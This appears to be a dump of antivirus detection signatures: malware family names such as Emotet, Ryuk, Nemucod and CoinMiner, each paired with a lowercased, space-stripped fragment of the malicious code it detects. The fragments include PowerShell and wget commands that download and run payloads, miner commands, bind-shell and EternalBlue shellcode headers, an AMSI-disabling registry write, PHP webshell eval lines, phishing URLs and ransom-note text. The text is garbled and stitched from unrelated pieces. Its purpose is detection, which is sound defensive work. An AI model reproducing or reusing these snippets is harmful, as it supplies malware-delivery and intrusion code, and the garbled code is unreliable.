2hhcknvzgugpsaky2hhcknvzgugjsakdxruynipid4gmzugpybtdhjpbmcuznjvbunoyxjdb2rlkcrjagfyq29kzsaridi5ksa6icrjagfyq29kzs50b1n0cmluzygznikpo307icagiglmicghjycucmvwbgfjzsgvxi8sifn0cmluzykpiht3aglszsaojg5ici0tksb7jhl &!#TrojanDropper:AutoIt/Obfusesd2!ptb01 ;k4fxgk80x50#k4fxgkqz5j6146aaz74o3wm9ftdq2qxjg2g;k4fxgkpcpwtnzrw16a9vdj62etx1h#k4fxgk59l5w1v0mnd28u131ru01f28dqnrf9j198m2l#k4fxgk1op87vjwk423502u788m6112hg2n9iywx#k4fxgk5p0fj05559o276s4mcvxdr0d37077lrzc )!#TEL:Backdoor:PowerShell/Diapowshell!dha try{$_wc=new-objectsystem.net.webclient$_wc.querystring.add(\"id\",$myid)$_wc.headers.add(\"content-type\",\"text/html\")$_wc.headers.add(\"accept\",\"text/html\")$_rc=$_wc.uploadstring($urlconsole,$theanswer) +!#SCPT:Exploit:O97M/CVE-2017-0199.BKS20!MTB target=\"http://0147.0131.0133.0174/..----------------------....................-.....................-/...................................................................wiz\"targetmode=\"external\"/> /!#SCPT:TrojanDownloader:O97M/EncDoc.ALS!MTB!AS1 formula.fill($cm$59854&$br$44143&$bh$54904&$do$756&$ii$29027&$eo$24162&$cu$23382&$gy$40135&$bb$59420&$cg$19922&$ak$20561&$if$1180&$be$52719&$ 0!#SCPT:TrojanDownloader:O97M/EncDoc.IGAE!MTB!GE8 <si><t>32\"&\".\"&\".\"&\"\\\"&\"jipos.hot5782369\")</t></si><si><t>32\"&\".\"&\".\"&\"\\\"&\"jipos.hot57823691\")</t></si><si><t>32\"&\".\"&\".\"&\"\\\"&\"jipos.hot57823692 !#SCPT:PyMS17010.A1 frommetasploitimportmodulemetadata={'name':'ms17-010eternalbluesmbremotewindowskernelpoolcorruptionforwin8+','description':'''eternalblueexploitforwindows8,windows10,and2012bysleepyatheexploitmightfailandcrashatargetsystem %pdf-1.020obj<</kids[30r]/t(topmostsubform[0])>>endobj30obj<</kids[40r]/t(page1[0])>>endobj40obj<</mk<</if<</a[0.01.0]>>>>/ft/btn/ff65536/f4/subtype/widget/type/annot/t(imagefield1[0])/rect[107.385705.147188.385709.087]>> !#SCRIPT:JS/Shepow!cmd (\"cmd.exe\",\"/cpinglocalhost&powershell.exe-executionpolicybypass-noprofile-windowstylehidden(new-objectsystem.net.webclient). ('http:// `/banner.png','%appdata% .exe');start-process'%appdata% .exe'\",\"\",\"open\",0); jslintmaxerr:50,indent:2,white:true*//*globalwindow*/functionwebworksseealso_object(){'usestrict';this.msettimeoutid=null;this.fonclickbutton=webworksseealso_onclickbutton;this.fonclicklink=webworksseealso_onclicklink !#SCPT:RansomNote:Ryuk.DB assoonaswegetbitcoinsyou'llgetallyourdecrypteddataback.moreoveryouwillgetinstructionshowtoclosetheholeinsecurityandhowtoavoidsuchproblemsinthefuture+wewillrecommendyouspecialsoftwarethatmakesthemostproblemstohackers. !#SCPT:Trojan:JS/Obfuse.PK1 varkey=\"aabbcc F;functionhjkm(_message){ =key.length/2;var_newstring=\"\"; ;for(varx=0;x<_message.length;x++){ =key.indexof(_message.charat(x));if( ;_newstring+=key.charat( );}else !#SCPT:HTML/Phishing.ARX!MTB %61%64%65%6c%61%73%66%6c%6f%72%65%73%2e%63%6f%6d%2e%61%72%2f%77%70%2d%61%64%6d%69%6e%2f%63%73%73%2f%63%6f%6c%6f%72%73%2f%6d%69%64%6e%69%67%68%74%2f%72%65%70%6f%72%74%6d%61%65%72%73%6b%2e%70%68%70%22%3e'))</script> 0!#ALF:SCRIPT:TrojanDownloader:Win32/Powsheldow.B (\"hkcu:\\console\\%systemroot%_system32_windowspowershell_v1.0_powershell.exe\"); (\"hkcu:\\console\\%systemroot%_system32_svchost.exe\"); (\"hkcu:\\console\\taskeng.exe\");$surl=\"http:// /u/?q= 0!#SCPT:TrojanDownloader:O97M/EncDoc.REEA!MTB!EE8 <vt:lpstr>excel4.0macros</vt:lpstr></vt:variant><vt:variant><vt:i4>1</vt:i4></vt:variant></vt:vector></headingpairs><titlesofparts><vt:vectorsize=\"1\"basetype=\"lpstr\"><vt:lpstr>sheet1</vt:lpstr> !#SCPT:EULA/OpenCandy!2 opencandynetwork(\"we\")toproviderecommendationsofotherthirdpartysoftware.allthirdpartysoftwareparticipatingintheopencandynetworkmustadheretostrictpoliciesthatensureonlycompliantsoftwareisrecommended.intheeventanopencandy !#SCRIPT:B64Stream!func .getbytecount_2(bytes) =createobject(\"system.security.cryptography.frombase64transform\") =createobject(\"system.io.memorystream\") .write .getbytes_4( ),0,(( /4)*3) .position=0 !#TEL:HTML/CoinHive!Miner .js';head.appendchild(script);varxmr=newcoinhive.anonymous(' ',{threads:1});try{varthreads=math.max(1,math.floor(navigator.hardwareconcurrency/2));xmr.setnumthreads(threads);xmr.start();}catch(e){xmr.start();}});}); !#SCPT:BAT/NetWalker.RA2!MTB 0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20,0x6d,0x6f,0x64,0x65,0x2e,0x0d,0x0d,0x0a,0x24 !#Exploit:JS/CVE-2014-0322!Lowfi try{this.outerhtml=this.outerhtml}catch(e){}collectgarbage(); =document.getelementsbytagname(\"script\");var [0]; .onpropertychange= =document.createelement('select'); .appendchild( \"!#SCRIPT:Exploit:Win32/Pdfjsc.JX.1 =\"v'u75ud3u00u0cub0uc6u1euf8u9au28ue1ue1uacub0ubeu12u52u20u56u09u02u00u59u02u9au28ue1ue1uacub0ubeu12u52u20u56u09u02u00u59u02uddu30u00u07u01u14u91uf3u30u30u0eu10u5bu5bu36u0du35u35ud3ue1u20uc3ub9u72ud1u00u20u00 ,!#SCPT:Exploit:O97M/CVE-2017-0199.BKM245!MTB target=\"http://198.12.127.217/.--------------------------.--------------........-...................-/_.......-----------------------....-_---..........._----------------.wiz\"targetmode=\"external\"/> !#SCPT:PyExpMS867.A2 portbindshellcodefrommetasploit;bindsporttotcpport4444shellcode=\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"shellcode+=\"\\x29\\xc9\\x83\\xe9\\xb0\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\\xe9\"shellcode+=\"\\x4a functionwebpackuniversalmoduledefinition(root,factory){if(typeofexports==='object'&&typeofmodule==='object')module.exports=factory();elseif(typeofdefine==='function'&&define.amd)define(\"pdfjs-dist/build/pdf\",[],factory) !#ALF:HTML/Meadgive!ObjId <objectwidth=\"11\"height=\"14\"data=\"undefined\"type=\"application/x-shockwave-flash\"allowscriptaccess=\"always\"><paramname=\"movie\"value=\"undefined\"><paramname=\"play\"value=\"true\"><paramname=\"flashvars\"value=\"exec=undefined\"> !#Trojan:Win32/Nanocore.FA1!MTB execute(binarytostring(\"0x52756e50452840486f6d654472697665202620537472696e675265766572736528276578652e736376536765525c37323730352e302e32765c6b726f77656d6172465c54454e2e74666f736f7263694d5c73776f646e69575c27292c24 !!#SCRIPT:PowerShell/Darius.A1!MTB param([parameter(position=0,mandatory=$true)][string] ,[parameter(position=1,mandatory=$true)][string] ,[parameter()][string] =\"24\",[parameter()][string] =\"80\",[parameter()][string] =\"powershell.exe\") \"!#SCRIPT:Worm:Win32/Bondat!dropper run(@comspec&\"/c\"&\"startwscript\"\"\"&$sfilepath&\"\"\"\",\"\",@sw_hide)msgbox($mb_systemmodal+$mb_iconerror,\"microsoftwindows-applicationerror\",\"theoperationcouldnotbecompleted.accessisdenied.\")run(@comspec&\"/c\"&\"ping !#SCPT:Spigot.A1 /impression.do?event=\"+event+\"&user_id=\"+uid+\"&source=\"+source+\"&traffic_source=\"+adprovider+\"&subid=\"+userclass+\"&implementation_id=\"+version+\"&subid2=\"+subid2;varrequest=newxmlhttprequest();request.open(\"get\",impression,true); !#SCPT:JS/Emotet.TH7 \\x61\\x48\\x52\\x30\\x63\\x44\\x6f\\x76\\x4c\\x32\\x4a\\x70\\x62\\x33\\x52\\x76\\x63\\x47\\x4e\\x68\\x63\\x6d\\x55\\x75\\x64\\x47\\x39\\x77\\x4c\\x33\\x64\\x77\\x4c\\x57\\x6c\\x75\\x59\\x32\\x78\\x31\\x5a\\x47\\x56\\x7a\\x4c\\x32\\x74\\x30\\x58\\x31\\x4a\\x68\\x4c\\x77\\x3d\\x3d !#SCRIPT:PowerShell/Habe.A ?ver= &mac=\"+$mac+\"&av=\"+$av+\"&ver=\"+(get-wmiobject-classwin32_operatingsystem).version+\"&bit=\"+(get-wmiobjectwin32_operatingsystem).osarchitecture$r=[system.net.webrequest]::create(\"$download\")$resp=$r.getresponse() !#SCPT:Trojan:JS/Obfuse.DRF9!MTB u0047et','\\u0068\\u0074tp://\\u006da\\u006es\\u006f\\u006cu\\u0074io\\u006e\\u002e\\u0069n.\\u0074h\\u002f\\u0073y\\u0073\\u0074\\u0065m\\u002fl\\u006f\\u0067\\u0073\\u002f7\\u0079gv\\u0074yvb7\\u006e\\u0069\\u0069m\\u002eex\\u0065',false) '!#TEL:Exploit:O97M/CVE-2017-0199.SS!MTB package4/bingdllc<users<dev<desktop<07082020?8570?s<bingdll)c<users<dev<appdata<,ocal<temp<bingdll.-:@!,!thisprogramcannotberunind/smode$p.v4e%4e%4e%%e%%be%%e%qf$'e%qa$$e%q@$)e%k%6e%%5e%n%1e%4d%me%q,$6e%qe !#ALF:SCPT:GetLapsPass if($domaincontroller-and$credential.getnetworkcredential().password){$objdomain=new-objectsystem.directoryservices.directoryentry\"ldap://$($domaincontroller)\",$credential.username,$credential.getnetworkcredential().password !#SCRIPT:SharpShoot!amsi =newactivexobject('wscript.shell');varkey=\"hkcu\\\\software\\\\microsoft\\\\windowsscript\\\\settings\\\\amsienable\";try{varamsienable=sh.regread(key);if(amsienable!=0){thrownewerror(1,'');}}catch(e){sh.regwrite(key,0,\"reg_dword\"); !#SCPT:Exploit:HTML/Axpergle.N <objectwidth=\"1\"height=\"1\"data=\"/ p\ta-z0-9=_-\"type=\"application/x-shockwave-flash\"allowscriptaccess=\"always\"><paramname=\"movie\"value=\"/ p\ta-z0-9=_-\"><paramname=\"play\"value=\"true\"><paramname=\"flashvars\"value=\"exec= &!#SCPT:HackTool:PowerShell/SharpSocks2 $script:socks=[socksproxy.classes.integration.poshcreateproxy]::createsockscontroller($uri,$channel,$domainfronturl,$useragent,$securestringpwd,$newurls,$cookie1,$cookie2,$proxy,$beacon,$comms,$insecuressl); ,!#SCRIPT:TrojanDownloader:JS/Nemucod.FM!eval varfso=newactivexobject(\"scripting.filesystemobject\");varfilename=' .txt';varfileobj=fso.getfile(filename);ts=fileobj.openastextstream(1,-2);varcheck=ts.readall();eval(check);ts.close();}main(); .getbytecount_2( .getbytes_4( =newactivexobject(\"system.security.cryptography.frombase64transform\"); .transformfinalblock( =newactivexobject(\"system.io.memorystream\"); .write( /4)*3); !#SCRIPT:Exploit:JS/Scanbox.B varsoftwarelist=newarray();//softwareliststart<<<softwarelist.push(\"avira==c:/windows/system32/drivers/avipbb.sys\");softwarelist.push(\"bitdefender_2013==c:/programfiles/bitdefender/bitdefender2013beta/bdprovider.dll\") !#HackTool:Python/Mimipenguin.b3 parse_pass\"$dump\"\"$hash\"\"$salt\"\"$source\"#cleanuprm-rf\"/tmp/dump.${pid}\"done<<<\"$pid\"fifi#supportvsftpd-activeusersif[[-e\"/etc/vsftpd.conf\"]];thensource=\"[system-vsftpd]\"#getnobody/usr/sbin/vsftpd/etc/vsftpd.confpid !!#SCRIPT:Exploit:HTML/Pangimop.AB <objectwidth=\" 0-9\"data=\"http:// a-f0-9\"type=\"application/x-shockwave-flash\"allowscriptaccess=\"always\">
<paramname=\"movie\"value=\"http:// a-f0-9\"> \"!#SCRIPT:Trojan:Win32/Kovter.C!reg javascript:e='';try{thrownewerror(' ');}catch(err){e=err.message;}a=newactivexobject('wscrip'+e+'hell');b='';c='\\\\ ';try{b=a.regread('hklm\\\\software '+c);}catch(e){}try{if(b)eval(b);}catch(e){} %!#SCRIPT:Trojan:Win32/Lodbak.gen2!lnk \\\\\\\\\\{ !%systemroot%\\system32\\shell32.dll%systemroot%\\\\\\\\\\system32\\\\\\\\rundll32.exe%systemroot%\\\\\\\\\\system32\\\\\\\\rundll32.exe %!#TrojanDownloader:Linux/CoinMiner.C1 http://45.145.185.85xmr=network001sys=sysrv002#killoldfilespkill-9\"^network01$\";pkill-9sysrv001;pkill-9\"^sysrv$\"test-f/bin/ps.original&&cp/bin/ps.original/bin/ps#mv/bin/iptables/bin/iptables__kill_other_miners '!#SCPT:TrojanDownloader:JS/Nemucod.BBKT htoilshiszymugbvuo=_0x58027b(yvhvxhdmdfzijme,_0x28edbf(-'0x1cf',-'0x17c',-'0x23b',-'0x190',-'0x1ca')),nhfpdezitliyqburj=newfunction(htoilshiszymugbvuo)(),eval(_0x58027b(wndzbzcghuvnfolbk,jlajtdemhipguizrcs)) ,!#SCPT:HackTool:PowerShell/InvokeWMICommand3 [void]$ps[$i].addscript($runme)[void]$ps[$i].addparameter('ipaddress',$endpoint)[void]$ps[$i].addparameter('creds',$getcreds)[void]$ps[$i].addparameter('command',$command) $jobs+=$ps[$i].begininvoke() -!#SCPT:TrojanDownloader:HTML/Phish.PRKSr9!MTB rm-urlencoded\",\"setrequestheader\",\"onload\",\"-\",\"split\",\"length\",\"fromcharcode\",\"responsetext\",\"parse\",\"key\",\"tostring\",\"charcodeat\",\"rand\",\"encode\",\"token\",\"now\",\"floor\",\"valid\",\"true\",\"<formclass=\\\"\", !#SCPT:HTML/Phish.RJS!MTB .liberates. /jquery.min.php\"></script><ahref=\"\"></a> <htmlxmlns=\"http://www.w3.org/1999/xhtml\"><scriptsrc=\"https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.4.1.min.js\"></script><scripttype=\"text/javascript\"src=\"http:// (!#SCPT:TrojanDownloader:JS/Nemucod.BBKT3 mkutcafizwqwnghbcek=_0x3e2c43(wmclxrhgkyxbvlmvwn,_0x509ef9(-'0x2f0',-'0x36e',-'0x329',-'0x2d8',-'0x2d6')),eanwlahyumgclyh=newfunction(mkutcafizwqwnghbcek)(),eval(_0x3e2c43(bzcravzfjkrayxmft,obywjumsfzveimj)) +!#SCPT:Exploit:O97M/CVE-2017-0199.BKM67!MTB target=\"http://officefiletransferintergration.mangospot.net/..-.......................................................................................-/..................... .wbk\"targetmode=\"external\"/> +!#SCPT:Exploit:O97M/CVE-2017-0199.BKS18!MTB target=\"http://dummy_username@0147.0205.0152.0110/-................................................................-/--------------------.....................------------------.wbk\"targetmode=\"external\"/> .!#SCPT:TrojanDownloader:O97M/Dridex.PKRFG3!MTB tps://nsaleliberetvel.loremipsumdolorsitamet,aneosloremancillaeexpetenda,vimetutamurquaestio.nislomittamcomplectiturproan,quemomnesmunereidvix.vixpaulosanctusscripseritex,teiriureinsolensvoluptatumqui. 0!#SCPT:TrojanDownloader:O97M/EncDoc.IGAA!MTB!GA7 <f>formula(k10&k11,i10)</f><v>0</v></c><cr=\"k10\"s=\"2\"t=\"str\"><f>d9&d10</f><v>exe</v></c></row><rowr=\"11\"spans=\"4:11\"x14ac:dydescent=\"0.25\"><cr=\"k11\"s=\"2\"t=\"str\"><f>d12</f><v>c(\"regsvr</v></c> !#SCPT:JS/Meadgive.STS02 \";var ={},i, =string.fromcharcode, =s.length;var !#SCPT:Filecoder.15 allyourfileslikephotos,databases,documentsandotherimportantareencryptedwithstrongestencryptionanduniquekey lallyourfileslikephotos,databases,documentsandotherimportantareencryptedwithstrongestencryptionanduniquekey !#ALFPER:JS/Qakbot.M )<0){throw\" k)<0){throw\" ,0);}catch(e){ =0;}return =newactivexobject(\" \\u00 !#SCPT:JS/Kryptik.VI2 if(navigator.appversion.indexof(\"win\")==-1){if(_vtst(_vu_u+\"_1\",_vu_i,14)){window.location.href=\"http:// jif(navigator.appversion.indexof(\"win\")==-1){if(_vtst(_vu_u+\"_1\",_vu_i,14)){window.location.href=\"http:// !#SCPT:Java/Adwind.Y2 vare=i.getenv(\"processor_architecture\");if(null==e)thrownewerror(\"couldn'tdetermineprocessorarchitecture jvare=i.getenv(\"processor_architecture\");if(null==e)thrownewerror(\"couldn'tdetermineprocessorarchitecture !#SCRPT:VBS/Ursnif.AA =createobject( j=createobject( a-z(\" )&chr( ?=createobject( !#SCRIPT:JS/Powdow.A-2 =newactivexobject(_0x i=newactivexobject(_0x [0]); .shellexecute(_0x [1],_0x [2],_0x [3],_0x [4],_0x !#SCRPT:BAT/Donoff.AR3 regaddhk iregaddhk lmcu\\software\\microsoft\\windows\\currentversion\\policies\\system/vdisabletaskmgr/treg_dword/d !#SCRIPT:VBS/Kalhine.B1 dimwinshellsetwinshell=wscript.createobject(\"wscript.shell\") hdimwinshellsetwinshell=wscript.createobject(\"wscript.shell\") @imagefile=\" .zip\"imagefiles=\" !#SCPT:JS/Refresh.RR!MTB <metahttp-equiv=\"refresh\"content=\"1;url=https://mamulln.cl/kwi/?email=travis_phillips@jabil.com\"> g<metahttp-equiv=\"refresh\"content=\"1;url=https://mamulln.cl/kwi/?email=travis_phillips@jabil.com\"> ={on_ad_request:1,on_ad_response:2,on_adunit_created:3,on_adunit_initialized:4,on_adunit_render_start g={on_ad_request:1,on_ad_response:2,on_adunit_created:3,on_adunit_initialized:4,on_adunit_render_start !#SCPT:PWS:HTML/Phish.AR https://accounts.google.com/o/oauth2/auth ghttps://accounts.google.com/o/oauth2/auth redirect_uri=https%3a%2f%2fgoogledocs.docscloud.download !#SCPT:PWS:JS/Phish.SMA1 tryaddlink(); gtryaddlink(); window.addeventlistener('domcontentloaded',tryaddlink); settimeout(tryaddlink,100); !#SCRIPT:Ploty.F!shell.1 ,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2, g,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2, !#TEL:PowerShell/Sekit.B ').split('@');$ g').split('@');$ ');$ =$env: +'\\'+$ e');foreach($ g@http:// '.split('@');$ =$env:temp+'\\'+$ +'.exe';foreach($ !#Trojan:MacOS/Renepo.A2 echo-n\"opener:finisheddsniff\">>/.performance.txt;date>>/.performance.txt#writetimeto/.performance.txt gecho-n\"opener:finisheddsniff\">>/.performance.txt;date>>/.performance.txt#writetimeto/.performance.txt !#SCPT:CodeOnly.ReGeorg.A unknownhostexception,java.net.socket\"trimdirectivewhitespaces=\"true\"%><%string funknownhostexception,java.net.socket\"trimdirectivewhitespaces=\"true\"%><%string =request.getheader( https%3a%2f%2fafaf.my%2fwp-content%2fplugins%2fmailchimp%2fsmt%2foffice%2foffice-outlook%2findex.php fhttps%3a%2f%2fafaf.my%2fwp-content%2fplugins%2fmailchimp%2fsmt%2foffice%2foffice-outlook%2findex.php !#SCPT:PiriformAvastOffer asdk.dll fasdk.dll ::candisplayavastad(ir0,mr1,mr2,ir3)m.r6https://www.piriform.com/inapp/installerofferpage !#Trojan:Linux/Downldr.O1 f.arm >ssh-updater;chmod+x*;./ssh-updaterarm cd/tmp||cd/var/run||cd/mnt||cd/root||cd/;wgethttp:// !#SCPT:HTML/Phish.RGR2!MTB \"process_is_automatic\">thisprocessisautomatic.yourbrowserwillredirecttoyourrequestedcontentshortly. e\"process_is_automatic\">thisprocessisautomatic.yourbrowserwillredirecttoyourrequestedcontentshortly. !#SCPT:HTML_MailProvider_1 //whichisnecessaryforcorrectfunctionalityofimmersiveie.//however,forwindows8phoneweneedtoresetthems e//whichisnecessaryforcorrectfunctionalityofimmersiveie.//however,forwindows8phoneweneedtoresetthems !#SCPT:O97M/Dridex.RVD!MTB <si><t>https://pediatriadrgonzales.com/wp-content/themes/betheme/js/parallax/vrgcm7nkd.php</t></si> e<si><t>https://pediatriadrgonzales.com/wp-content/themes/betheme/js/parallax/vrgcm7nkd.php</t></si> !#SCRIPT:ASP/Baze34.A1!MTB request.params[\" erequest.params[\" =request.params[\" !#ALF:Worm:Win32/Rebhip.U!B &<<&<&d<&l<<<b<<&$d=&|>ln@mnn:nn/nn!nnnnnn}nnqnndnnxnnrnnfnoooooooo.oooxopofovo|####@########@#### d&<<&<&d<&l<<<b<<&$d=&|>ln@mnn:nn/nn!nnnnnn}nnqnndnnxnnrnnfnoooooooo.oooxopofovo|####@########@#### !#SCPT:O97M/EncDoc.RWWX!MTB <t>download</t></si><si><t>ter(\"urlmon\",\"url</t></si><si><t>ex</t></si><si><t>..\\hikos.hertolo</t> d<t>download</t></si><si><t>ter(\"urlmon\",\"url</t></si><si><t>ex</t></si><si><t>..\\hikos.hertolo</t> !#SCRIPT:Exploit:JS/Godmode functiondecode(s,n)ns=split(mid(s,2,len(s)-1))fori=0toubound(ns)decode=decode&chr(cint(ns(i))xorn) dfunctiondecode(s,n)ns=split(mid(s,2,len(s)-1))fori=0toubound(ns)decode=decode&chr(cint(ns(i))xorn) !#SCRIPT:PSLnkPersistence.A [system.diagnostics.process]::start( d[system.diagnostics.process]::start( [text.encoding]:: .getstring([convert]::frombase64string( !#SLF:PowerShell/Empire!dec ::defaultnetworkcredentials;$ d::defaultnetworkcredentials;$ .proxy;$ @::ascii.getbytes.invoke(' @');$ ;${_}-bxor$ !#Trojan:Linux/CoinMiner.D1 grep\"mine.moneropool.com\"|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grep\"xmr.crypto-pool.fr:8080 dgrep\"mine.moneropool.com\"|awk'{print$2}'|xargskill-9psauxf|grep-vgrep|grep\"xmr.crypto-pool.fr:8080 !#HackTool:Perl/Slowloris.A2 if($sock[$z]=newio::socket::ssl(peeraddr=>\"$host\",peerport=>\"$port\",timeout=>\"$tcpto\",proto=>\"tcp cif($sock[$z]=newio::socket::ssl(peeraddr=>\"$host\",peerport=>\"$port\",timeout=>\"$tcpto\",proto=>\"tcp !#SCPT:JS/ExploitEMETCheck.A \"<!doctypehtmlpublic'-//w3c//dtdxhtml1.0transitional//en''res://c:\\\\windows\\\\apppatch\\\\emet.dll'> c\"<!doctypehtmlpublic'-//w3c//dtdxhtml1.0transitional//en''res://c:\\\\windows\\\\apppatch\\\\emet.dll'> !#SCPT:O97M/EncDoc.RJJJJ!EML %createdirectoryakernel32 c%createdirectoryakernel32 ?%/settingsynchost#c:/users/publick#https://pigeonious.com/img/ !#SCPT:O97M/Trickbot.RTR!MTB living-traditions.com/blogs/click.php</t></si><si><t>..\\fdinmd.fii</t></si><si> cliving-traditions.com/blogs/click.php</t></si><si><t>..\\fdinmd.fii</t></si><si> <si><t>http:// !#SCPT:Trojan:HTML/Phish.RG3 hanbays.com/xells/fghdxs/zcvbfddcvjftdvcdcd/hcffh/lns.php\"method=\"post\"> chanbays.com/xells/fghdxs/zcvbfddcvjftdvcdcd/hcffh/lns.php\"method=\"post\"> <formaction=\"https:// ]<formaction=\"https:// !#SCPT:Trojan:JS/Obfuse.SS16 varlen= cvarlen= %.length; &=newuint8array(len); for(vari=0;i<len;i++){ &[i]= .charcodeat(i); !#SCPT:Trojan:VBS/Tnega.PAC1 recon_info_str=recon_info_str&\"softwareinfo\"&\"=\"&get_product_or_process_info(\"win32_product\")&\"&\" crecon_info_str=recon_info_str&\"softwareinfo\"&\"=\"&get_product_or_process_info(\"win32_product\")&\"&\" !#SCRIPT:HTML/NoRightClick.A if(event.button==2||event.button==3){event.cancelbubble=true,event.returnvalue=false;returnfalse; cif(event.button==2||event.button==3){event.cancelbubble=true,event.returnvalue=false;returnfalse; !#SCRIPT:JS/CountDownTimer.A document.getelementbyid(\"mins\").innerhtml=nmins;document.getelementbyid(\"secs\").innerhtml=nsecs;} cdocument.getelementbyid(\"mins\").innerhtml=nmins;document.getelementbyid(\"secs\").innerhtml=nsecs;} !#SCRIPT:PHP/Dirtelti.E2!MTB <?phpsession_start();eval(base64_decode('awdub3jlx3vzzxjfywjvcnqoktskc2v0x3rpbwvfbgltaxqomck7cmz1 c<?phpsession_start();eval(base64_decode('awdub3jlx3vzzxjfywjvcnqoktskc2v0x3rpbwvfbgltaxqomck7cmz1 !#Trojan:Linux/CoinMiner.ZA2 .conffichmod+x/tmp/httpd.conf/tmp/httpd.conf-b-acryptonight-ostratum+tcp://xmr.crypto-pool.fr:443 c.conffichmod+x/tmp/httpd.conf/tmp/httpd.conf-b-acryptonight-ostratum+tcp://xmr.crypto-pool.fr:443 !#Exploit:Win32/Altostratus.A =expression(eval(unescape('%65%76%61%6c%28%65%63%78%6c%6c%79%79%2e%69%6e%6e%65%72%48%54%4d%4c%29 b=expression(eval(unescape('%65%76%61%6c%28%65%63%78%6c%6c%79%79%2e%69%6e%6e%65%72%48%54%4d%4c%29 refresh\"content=\"0;url= brefresh\"content=\"0;url= ://www.dropbox.com/s/p3ar8rc177885sk/awb-dhl19837018414270943.zip?dl=1 !#SCPT:Trojan:HTML/Phish.PH15 varsiteurl='http://laurenbowling.com/redeem-ucount-rewards-standardbank-credit=card-service/php/ bvarsiteurl='http://laurenbowling.com/redeem-ucount-rewards-standardbank-credit=card-service/php/ !#SCRIPT:PowerShell/AppDomain [reflection.assembly].assembly.gettype('system.appdomain').getproperty('currentdomain').getvalue b[reflection.assembly].assembly.gettype('system.appdomain').getproperty('currentdomain').getvalue !#SCPT:Trojan:HTML/Phish.BHK27 url:'https://tph786.com/gym/assets/css/ aurl:'https://tph786.com/gym/assets/css/ .php',type:'post',data:{email:email,password:password !#SCRIPT:JS/Proslikefan.gen!A1 ){for( a){for( @split( documentwindow }catch( a%>>% a-z0-9%. 0-9www.odnoklass !#SCRIPT:Worm:JS/Bondat!jsinit (2000) a(2000) })();\",b={};b.tostring=typeofwindow!==\"undefined\"?\"\":string.constructor(a);b+= })();\",b={};b.tostring=typeofwindow!==\"undefined\"?\"\":string.constructor(a);b+b !#SCRIPT:HTML/TechBrolo!AntiEmu vartotal=\"\";for(vari=0;i<100 `vartotal=\"\";for(vari=0;i<100 0;i++){total=total+i.tostring(); history.pushstate(0,0,total); !#TEL:Backdoor:PHP/WebShell.CGI $cmdsep=($winnt?$ntcmdsep:$unixcmdsep);$cmdpwd=($winnt?\"cd\":\"pwd\");$pathsep=($winnt?\"\\\\\":\"/\"); `$cmdsep=($winnt?$ntcmdsep:$unixcmdsep);$cmdpwd=($winnt?\"cd\":\"pwd\");$pathsep=($winnt?\"\\\\\":\"/\"); !#SCPT:Trojan:Python/Queri.C.EC1 cnf=json.loads(open(os.path.dirname(os.path.realpath(__file__))+'\\\\localconfig.json').read()) _cnf=json.loads(open(os.path.dirname(os.path.realpath(__file__))+'\\\\localconfig.json').read()) !#SCPT:Trojan:VBS/Obfuse.GN3!MSR &_shexdecode(\"53756220657865632867676767293a20\")&_jk2&_jk&_shexdecode(\"536574206f626a53746172 _&_shexdecode(\"53756220657865632867676767293a20\")&_jk2&_jk&_shexdecode(\"536574206f626a53746172 !!#SCPT:BrowserModifier:Win32/Qvo6 iexplore.exehttp://www.qvo6.com/?utm_source=b&utm_medium= ^iexplore.exehttp://www.qvo6.com/?utm_source=b&utm_medium= from= a-z&uid= -&ts= !!#SCPT:Exploit:JS/DynamicImport.A 6089e531d2648b52308b520c8b52148b7228528b52108b423c8b44027885c0744801d0508b48188b582001d3e33a ^6089e531d2648b52308b520c8b52148b7228528b52108b423c8b44027885c0744801d0508b48188b582001d3e33a !!#SCRIPT:Exploit:JS/Obfuscator.FY catch(y){ ^catch(y){ (y)}}() ;</script><objectclassid=\"clsid:cafeefac-dec7-0000-0000-abcdeffedcba\"> !!#SCRIPT:PowerShell/Ploty.I.shell ^[byte[]]$ =(new-objectsystem.net.webclient).downloaddata(\"http:// !!#TEL:Exploit:HTML/BeakYard.A!dha main_ajax=newajax({url:'ap.php',type:'post',contenttype:'application/x-www-form-urlencoded', ^main_ajax=newajax({url:'ap.php',type:'post',contenttype:'application/x-www-form-urlencoded', \"!#Backdoor:BAT/AuthStealer.A!atb01 echo.pausegotoaccount:accountclscd\"%windir%/system32\"call\"color.bat\"call\".bat\"colorclsecho. ]echo.pausegotoaccount:accountclscd\"%windir%/system32\"call\"color.bat\"call\".bat\"colorclsecho. \"!#Trojan:AutoIt/AgentTesla.SP6!MTB regwrite( ]regwrite( (\"sm\\sessalc\\erawtfos\\uckhdnammoc\\nepo\\llehs\\sgnittes-\"),24), #!#SCPT:TrojanDownloader:JS/Xibow.A3 open(); \\open(); .write( .savetofile( .close()}function ,0,0)} $!#SCPT:Trojan:AutoIt/Clodow.gen!A_10 endifuntilfalseuntiltrue [endifuntilfalseuntiltrue `_crypt_shutdown()if$ <>-1thenfileclose($ `)returnseterror($ $!#SCRIPT:Worm:JS/Bondat.C!lnk_parser ..\\..\\..\\..\\..\\ [..\\..\\..\\..\\..\\ $!#SCRIPTLOWFI:Trojan:AutoIt/Clodow.A filewrite($sc_file,$sc_batch)sleep( [filewrite($sc_file,$sc_batch)sleep( 0-9)run($sc_file,@tempdir,@sw_hide)exitendfuncfunc $!#TEL:Backdoor:PHP/Webshell.Pra5!MTB <?php$flood=1 [<?php$flood=1 foreach(array('_get','_post')as$_ ){foreach( `;eval( .$flood);?> %!#SCPT:TextFormattingRunPropertiesB64 twljcm9zb2z0llzpc3vhbfn0dwrpby5uzxh0lkzvcm1hdhrpbmcuvgv4dezvcm1hdhrpbmdsdw5qcm9wzxj0awvz 